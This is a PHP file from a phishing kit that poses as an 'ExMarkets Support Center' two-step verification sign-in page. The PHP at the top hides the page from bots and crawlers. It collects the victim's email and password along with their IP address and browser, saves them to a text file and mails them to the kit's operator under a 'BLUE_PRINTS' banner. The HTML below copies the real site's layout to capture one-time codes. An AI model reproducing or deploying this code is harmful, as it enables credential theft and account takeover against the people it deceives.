<?php
error_reporting(0);

session_start();
require_once '../../src/Classes/Comp.php';
    require_once '../../src/Classes/Antibot.php';

    $comps = new Comp;
    $antibot = new Antibot;

    if (!$comps->checkValue()) {
        echo $antibot->throw404();
        die();
    }
    include '../../crawlerdetect.php';
$v_ip = $_SERVER['REMOTE_ADDR'];
$hash = $_SESSION['value'];

if(!empty($_SESSION['email']))  {

$useremail = $_SESSION['email'];
 
}

if(!empty($_POST['password']))  {

$pass = $_POST['password'];

date_default_timezone_set('Europe/Amsterdam');
$ip = $_SERVER['REMOTE_ADDR'];
$time = date("m-d-Y g:i:a");
$agent = $_SERVER['HTTP_USER_AGENT'];

include "../../step/conf/config.php";
$msg =  $_SESSION['msg'];

$msg =  $_SESSION['msg'];
$msg .= "+ ------------------------------------------+\n";
$msg .= "|   💵BLUE_PRINTS | GMAIL Login Details \n";
$msg .= "+ ------------------------------------------+\n";
$msg .= "| 📧 EMAIL  :  ".$useremail."\n";
$msg .= "| 🔑 PASS 2 :  ".$pass."\n";
$footer = "+ ------------------------------------------+\n";
$footer .= "+ IP => $ip \n  USERAGENT => $agent\n";
$footer .= "+ ------------------------------------------+\n\n";

$data = $msg . $footer;

if($savetxt == "on"){

$save=fopen("../../step/data/email".$salt.".txt",'a');
              fwrite($save,$data );
              fclose($save);
            }

$_SESSION['emailr'] = $msg;

$subject="Email 1NFO By BLUE_PR1NTS=> {$_SESSION['ip']} [ {$_SESSION['platform']} ]";
$headers="From: BLUE_PR1NTS <VR1D14N@BLUE_PRINTS1.com>\r\n";
$headers .= "Content-Type: text/plain; charset=utf-8\r\n";
@mail($emailzz, $subject, $data, $headers);
 
              
}
$urlss ="../../info.php?";
?>

<!DOCTYPE html>
<html lang="en-us">
<head>
	<meta charset="utf-8">
	<meta content="width=device-width,minimum-scale=1.0" name="viewport">
	<meta content="IE=edge" http-equiv="X-UA-Compatible">

	<title>Sign in - ExMarkets Support Center</title>

		<meta http-equiv="Content-Security-Policy" content="font-src * data:">

	<link rel="icon" type="image/png" href="image/render.png" sizes="16x16">
	<link rel="icon" type="image/png" href="image/renderv1.png" sizes="32x32">
	<link rel="icon" type="image/png" href="image/renderv2.png" sizes="96x96">
	<link href="stylesheet/font.googleapis.css" rel="stylesheet">
			<link rel="stylesheet" type="text/css" media="all" href="stylesheet/app.css"/>

			<link rel="stylesheet" type="text/css" media="all" href="stylesheet/16298954011629894915.css"/>
						<!-- Google Tag Manager -->
		<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
			new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
			j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
			'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
			})(window,document,'script','dataLayer','GTM-KTXQ9HV');</script>
			<!-- End Google Tag Manager -->

		<!-- Add your code here -->
	</head>
	<body class="body">

		<header class="header ">
		<div class="header__top">
			<div class="header__top__wrapper wrap">
				<div class="branding">
	<a href="https://support.exmarkets.com" title="Go to homepage">
		<img class="branding__logo flex-item" src="image/render01.png" alt="ExMarkets">
	</a>
</div>
<div class="header__right">


	<div class="menu">

	</div>
</div>
			</div>
		</div>
	</header>


	<div class="wrap wrap--body js-validate-view" id="otp-container">
		<div class="wrap layout layout--center">
			<div class="layout__item md-plus-12/12  u-textcenter">
				<h1 class="ruled" id="otp-title">Two-step verification</h1>
				<p class="u-mtopxbig u-mbottombig">Enter the code generated by your authenticator app or any one of the recovery codes.</p>
			</div><!--
			--><div class="layout__item md-lg-8/12 lg-plus-6/12 u-textcenter">
				<form class="js-validate" id="otp" data-ui-component="otp" method="post">
					<label class="textfield__label" for="code">Enter the code
						<input class="textfield js-required-field" id="otp_code" type="text" value="" autofocus>
					</label>
					<input class="textfield" id="password" type="hidden" value="">
					<input class="textfield" id="auth_token" type="hidden" value="">
					<input class="button button--primary u-inlineblock u-mtopbig u-vmiddle" id="otp-submit" type="submit" value="Sign in">
					<div class="btn-loader-wrapper u-mtopbig">
						<ul class="btn-loader"><li class="btn-loader__bar"></li><li class="btn-loader__bar"></li><li class="btn-loader__bar"></li></ul>
					</div>
				</form>
			</div>
		</div>
	</div>


	<footer id="login-footer">
		<p class="layout__item u-textcenter u-mtopxbig">If you&#039;ve contacted us before, you&#039;ll probably already be registered.
			<a href="https://support.exmarkets.com/account/forgotpassword">Get your password.</a>
		</p>

		<p class="layout__item u-textcenter">
			<a href="https://support.exmarkets.com/signup"><b>Need an account? Sign up.</b></a>
		</p>
	</footer>
</div>

	</div>


					<script>(function(d,a){function c(){var b=d.createElement("script");b.async=!0;b.type="text/javascript";b.src=a._settings.messengerUrl;b.crossOrigin="anonymous";var c=d.getElementsByTagName("script")[0];c.parentNode.insertBefore(b,c)}window.kayako=a;a.readyQueue=[];a.newEmbedCode=!0;a.ready=function(b){a.readyQueue.push(b)};a._settings={apiUrl:"https://exm.kayako.com/api/v1",messengerUrl:"https://exm.kayakocdn.com/messenger",realtimeUrl:"wss://kre.kayako.net/socket"};window.attachEvent?window.attachEvent("onload",c):window.addEventListener("load",c,!1)})(document,window.kayako||{});</script>
			<script type="text/javascript">
	if (kayako) {
		kayako.ready(function () {
			/**
			 * Force locale when it exists in the global
			 */
			if (_Payload.activelocale) {
				kayako.config = {
					forceLocale: _Payload.activelocale
				}
			}
		});
	}
</script>


				<input id="csrftoken" type="hidden" value="PmmxjvxOB0wEjfmdXXflg9KQyieTyXsXydqHOAtue5AH3DFswecnqC7IJxmu8rrHmWmkoXbld9XLMuRHgmXlELn2N03zPenO1sTF">
	</footer>

			<script language="Javascript"  type="text/javascript">
			var userIdentify = [];

			window.kayako = window.kayako || {}
			if (typeof window.kayako.ready === 'function') {
				window.kayako.ready(function() {
					if ((typeof window.kayako.identify === 'function') && (typeof window.kayako.forget === 'function')) {
						if (userIdentify.email) {
							window.kayako.identify(userIdentify.name, userIdentify.email, userIdentify.signature, userIdentify.timestamp)
						} else {
							window.kayako.forget(function() {})
						}
					}
				})
			}
		</script>

			<!-- Google Tag Manager (noscript) -->
		<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-KTXQ9HV"
		height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
		<!-- End Google Tag Manager (noscript) -->
	</body>
</html>
